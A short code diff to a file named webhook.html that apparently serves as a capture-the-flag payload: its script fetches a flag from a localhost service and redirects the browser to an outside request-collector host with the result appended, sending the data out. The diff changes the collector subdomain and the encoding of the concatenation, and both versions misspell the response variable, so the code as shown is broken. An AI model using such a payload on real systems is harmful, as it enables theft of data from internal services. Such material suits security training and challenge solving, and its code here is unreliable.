--- a/webhook.html
+++ b/webhook.html
@@ -9,5 +9,5 @@ const options = {
 };
 
 fetch('http://localhost:8000/flag', options)
-  .then(response => location='https://uitfdds.request.dreamhack.games/'%2breponse)
+  .then(response => location='https://jtcoakj.request.dreamhack.games/'+reponse)
 </script>
